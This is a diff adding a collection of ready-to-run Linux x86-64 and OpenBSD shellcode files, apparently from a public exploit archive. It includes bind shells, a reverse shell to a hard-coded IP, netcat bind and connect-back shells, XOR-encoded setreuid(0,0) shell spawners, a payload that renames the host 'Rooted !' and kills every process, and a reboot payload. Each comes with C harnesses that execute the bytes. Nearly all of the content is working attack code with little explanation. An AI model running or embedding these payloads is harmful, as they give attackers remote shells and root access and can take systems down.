shellcodes/linux_x86-64/43597.c Normal file
View file

@ -0,0 +1,77 @@
/*
Shell Bind TCP Random Port Shellcode - C Language - Linux/x86_64
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
*/
/*
shell_bind_tcp_random_port_shellcode_x86_64
assembly source: https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm
* 57 bytes
* null-free
# gcc -m64 -fno-stack-protector -z execstack shell_bind_tcp_random_port_shellcode_x86_64.c -o shell_bind_tcp_random_port_shellcode_x86_64
Testing
# ./shell_bind_tcp_random_port_shellcode_x86_64
# netstat -anp | grep shell
# nmap -sS 127.0.0.1 -p- (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to the port open by shellcode)
# nc 127.0.0.1 port
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xf6\x48\xf7\xe6\xff\xc6\x6a\x02"
"\x5f\xb0\x29\x0f\x05\x52\x5e\x50\x5f\xb0"
"\x32\x0f\x05\xb0\x2b\x0f\x05\x57\x5e\x48"
"\x97\xff\xce\xb0\x21\x0f\x05\x75\xf8\x52"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
"\x57\x54\x5f\xb0\x3b\x0f\x05";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(code));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("mov $0xffffffffffffffff, %rax\n\t"
"mov %rax, %rbx\n\t"
"mov %rax, %rcx\n\t"
"mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t"
"mov %rax, %rdi\n\t"
"mov %rax, %rbp\n\t"
// Calling the shellcode
"call code");
}

112
shellcodes/linux_x86-64/43598.c Normal file
View file

@ -0,0 +1,112 @@
/*
Title : tcpbindshell (150 bytes)
Date : 04 October 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 ff xor rdi,rdi
400086: 48 31 f6 xor rsi,rsi
400089: 48 31 d2 xor rdx,rdx
40008c: 4d 31 c0 xor r8,r8
40008f: 6a 02 push 0x2
400091: 5f pop rdi
400092: 6a 01 push 0x1
400094: 5e pop rsi
400095: 6a 06 push 0x6
400097: 5a pop rdx
400098: 6a 29 push 0x29
40009a: 58 pop rax
40009b: 0f 05 syscall
40009d: 49 89 c0 mov r8,rax
4000a0: 4d 31 d2 xor r10,r10
4000a3: 41 52 push r10
4000a5: 41 52 push r10
4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b2: 48 89 e6 mov rsi,rsp
4000b5: 41 50 push r8
4000b7: 5f pop rdi
4000b8: 6a 10 push 0x10
4000ba: 5a pop rdx
4000bb: 6a 31 push 0x31
4000bd: 58 pop rax
4000be: 0f 05 syscall
4000c0: 41 50 push r8
4000c2: 5f pop rdi
4000c3: 6a 01 push 0x1
4000c5: 5e pop rsi
4000c6: 6a 32 push 0x32
4000c8: 58 pop rax
4000c9: 0f 05 syscall
4000cb: 48 89 e6 mov rsi,rsp
4000ce: 48 31 c9 xor rcx,rcx
4000d1: b1 10 mov cl,0x10
4000d3: 51 push rcx
4000d4: 48 89 e2 mov rdx,rsp
4000d7: 41 50 push r8
4000d9: 5f pop rdi
4000da: 6a 2b push 0x2b
4000dc: 58 pop rax
4000dd: 0f 05 syscall
4000df: 59 pop rcx
4000e0: 4d 31 c9 xor r9,r9
4000e3: 49 89 c1 mov r9,rax
4000e6: 4c 89 cf mov rdi,r9
4000e9: 48 31 f6 xor rsi,rsi
4000ec: 6a 03 push 0x3
4000ee: 5e pop rsi
00000000004000ef <doop>:
4000ef: 48 ff ce dec rsi
4000f2: 6a 21 push 0x21
4000f4: 58 pop rax
4000f5: 0f 05 syscall
4000f7: 75 f6 jne 4000ef <doop>
4000f9: 48 31 ff xor rdi,rdi
4000fc: 57 push rdi
4000fd: 57 push rdi
4000fe: 5e pop rsi
4000ff: 5a pop rdx
400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
400107: 2f 73 68
40010a: 48 c1 ef 08 shr rdi,0x8
40010e: 57 push rdi
40010f: 54 push rsp
400110: 5f pop rdi
400111: 6a 3b push 0x3b
400113: 58 pop rax
400114: 0f 05 syscall
Code not is not optimal, this is left as an exercise to the reader ;^)
*/
#include <stdio.h>
#define PORT "\x7a\x69" /* 31337 */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
int
main(void)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
return 0;
}

92
shellcodes/linux_x86-64/43599.c Normal file
View file

@ -0,0 +1,92 @@
/*
Title : reversetcpbindshell (118 bytes)
Date : 04 October 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
$ objdump -D reversetcpbindshell -M intel
reversetcpbindshell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 ff xor rdi,rdi
400086: 48 31 f6 xor rsi,rsi
400089: 48 31 d2 xor rdx,rdx
40008c: 4d 31 c0 xor r8,r8
40008f: 6a 02 push 0x2
400091: 5f pop rdi
400092: 6a 01 push 0x1
400094: 5e pop rsi
400095: 6a 06 push 0x6
400097: 5a pop rdx
400098: 6a 29 push 0x29
40009a: 58 pop rax
40009b: 0f 05 syscall
40009d: 49 89 c0 mov r8,rax
4000a0: 48 31 f6 xor rsi,rsi
4000a3: 4d 31 d2 xor r10,r10
4000a6: 41 52 push r10
4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a
4000ba: 04
4000bb: 48 89 e6 mov rsi,rsp
4000be: 6a 10 push 0x10
4000c0: 5a pop rdx
4000c1: 41 50 push r8
4000c3: 5f pop rdi
4000c4: 6a 2a push 0x2a
4000c6: 58 pop rax
4000c7: 0f 05 syscall
4000c9: 48 31 f6 xor rsi,rsi
4000cc: 6a 03 push 0x3
4000ce: 5e pop rsi
00000000004000cf <doop>:
4000cf: 48 ff ce dec rsi
4000d2: 6a 21 push 0x21
4000d4: 58 pop rax
4000d5: 0f 05 syscall
4000d7: 75 f6 jne 4000cf <doop>
4000d9: 48 31 ff xor rdi,rdi
4000dc: 57 push rdi
4000dd: 57 push rdi
4000de: 5e pop rsi
4000df: 5a pop rdx
4000e0: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
4000e7: 2f 73 68
4000ea: 48 c1 ef 08 shr rdi,0x8
4000ee: 57 push rdi
4000ef: 54 push rsp
4000f0: 5f pop rdi
4000f1: 6a 3b push 0x3b
4000f3: 58 pop rax
4000f4: 0f 05 syscall
Code not is not optimal, this is left as an exercise to the reader ;^)
*/
#include <stdio.h>
#define IPADDR "\xc0\x80\x10\x0a" /* 192.168.1.10 */
#define PORT "\x7a\x69" /* 31337 */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
int
main(void)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
return 0;
}

64
shellcodes/linux_x86-64/43601.asm Normal file
View file

@ -0,0 +1,64 @@
; { Title: Shellcode linux/x86-64 bind-shell with netcat }
; Author : Gaussillusion
; Len : 131 bytes
; Language : Nasm
BITS 64
xor rdx,rdx
mov rdi,0x636e2f6e69622fff
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff
shr r10,0x20
push r10
mov r10,rsp
mov r9,0x702dffffffffffff
shr r9,0x30
push r9
mov r9,rsp
mov r8,0x6c2dffffffffffff
shr r8,0x30
push r8
mov r8,rsp
push rdx ;push NULL
push rcx ;push address of 'bin/sh'
push rbx ;push address of '-e'
push r10 ;push address of '1337'
push r9 ;push address of '-p'
push r8 ;push address of '-l'
push rdi ;push address of '/bin/nc'
mov rsi,rsp
mov al,59
syscall
; _bytecode_start_
;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62
;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1
;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb
;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33
;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9
;\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41
;\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d
;\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53
;\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
; _bytecode_end_

62
shellcodes/linux_x86-64/43602.asm Normal file
View file

@ -0,0 +1,62 @@
; { Title: Shellcode linux/x86-64 connect back shell }
; Author : Gaussillusion
; Len : 109 bytes
; Language : Nasm
;syscall: execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL)
BITS 64
xor rdx,rdx
mov rdi,0x636e2f6e69622fff
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff
shr r10,0x20
push r10
mov r10,rsp
jmp short ip
continue:
pop r9
push rdx ;push NULL
push rcx ;push address of 'bin/sh'
push rbx ;push address of '-e'
push r10 ;push address of '1337'
push r9 ;push address of 'ip'
push rdi ;push address of '/bin/nc'
mov rsi,rsp
mov al,59
syscall
ip:
call continue
db "127.0.0.1"
;______________________bytecode_______________________
;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62
;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1
;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb
;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33
;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11
;\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89\xe6
;\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e
;\x30\x2e\x30\x2e\x31
;______________________bytecode_______________________

14
shellcodes/linux_x86-64/43603.c Normal file
View file

@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ash",NULL,NULL) + XOR encoded - 85 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x7f\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x37\x4e\xbf\x37\xfc\xbf"
"\x0e\x37\x4e\x80\x37\x4e\x89\x70\x7a\x94\x6f\x37\x4e\xbf\x37"
"\xfc\xbf\x44\x20\x37\x4e\x89\x37\x4e\xad\x70\x7a\x97\x94\x80"
"\x80\x80\x50\x1d\x16\x11\x50\x1e\x0c\x17";
int main(void) { ((void (*)())shellcode)(); }

14
shellcodes/linux_x86-64/43604.c Normal file
View file

@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/csh", ["/bin/csh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\xe3\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xab\xd2\x23\xab\x60\x23"
"\x92\xab\xd2\x1c\xab\xd2\x15\xec\xe6\x08\xf1\xab\xd2\x23\xab"
"\x60\x23\xd8\xbc\xab\xd2\x31\xb1\xb4\xab\x6a\x05\xec\xe6\x0b"
"\x0a\x1c\x1c\x1c\xcc\x81\x8a\x8d\xcc\x80\x90\x8b";
int main(void) { ((void (*)())shellcode)(); }

14
shellcodes/linux_x86-64/43605.c Normal file
View file

@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ksh", ["/bin/ksh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x17\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x5f\x26\xd7\x5f\x94\xd7"
"\x66\x5f\x26\xe8\x5f\x26\xe1\x18\x12\xfc\x05\x5f\x26\xd7\x5f"
"\x94\xd7\x2c\x48\x5f\x26\xc5\x45\x40\x5f\x9e\xf1\x18\x12\xff"
"\xfe\xe8\xe8\xe8\x38\x75\x7e\x79\x38\x7c\x64\x7f";
int main(void) { ((void (*)())shellcode)(); }

14
shellcodes/linux_x86-64/43606.c Normal file
View file

@ -0,0 +1,14 @@
# Title: Linux x86-64 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 87 bytes
# Author: egeektronic <info (at) egeektronic {dot} com>
# Twitter: @egeektronic
# Tested on: Slackware 13.37
# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer
unsigned char shellcode[] =
"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb"
"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48"
"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc"
"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74"
"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4"
"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54";
int main(void) { ((void (*)())shellcode)(); }

43
shellcodes/linux_x86-64/43607.c Normal file
View file

@ -0,0 +1,43 @@
# Linux/x86_64 sethostname() & killall 33 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
/*
; sethostname("Rooted !");
; kill(-1, SIGKILL);
section .text
global _start
_start:
;-- setHostName("Rooted !"); 22 bytes --;
mov al, 0xaa
mov r8, 'Rooted !'
push r8
mov rdi, rsp
mov sil, 0x8
syscall
;-- kill(-1, SIGKILL); 11 bytes --;
push byte 0x3e
pop rax
push byte 0xff
pop rdi
push byte 0x9
pop rsi
syscall
*/
int main(void)
{
char shellcode[] =
"\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89"
"\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05";
(*(void (*)()) shellcode)();
return 0;
}

18
shellcodes/openbsd_x86/43608.c Normal file
View file

@ -0,0 +1,18 @@
// ----------bsd/x86 reboot() shellcode-----------------
// AUTHOR : beosroot
// INFO : OpenBSD x86 reboot() shellcode
// EMAIL : beosroot@null.net
// beosroot@hotmail.fr
char shellcode[] = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
int main() {
int *ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
// the end o.O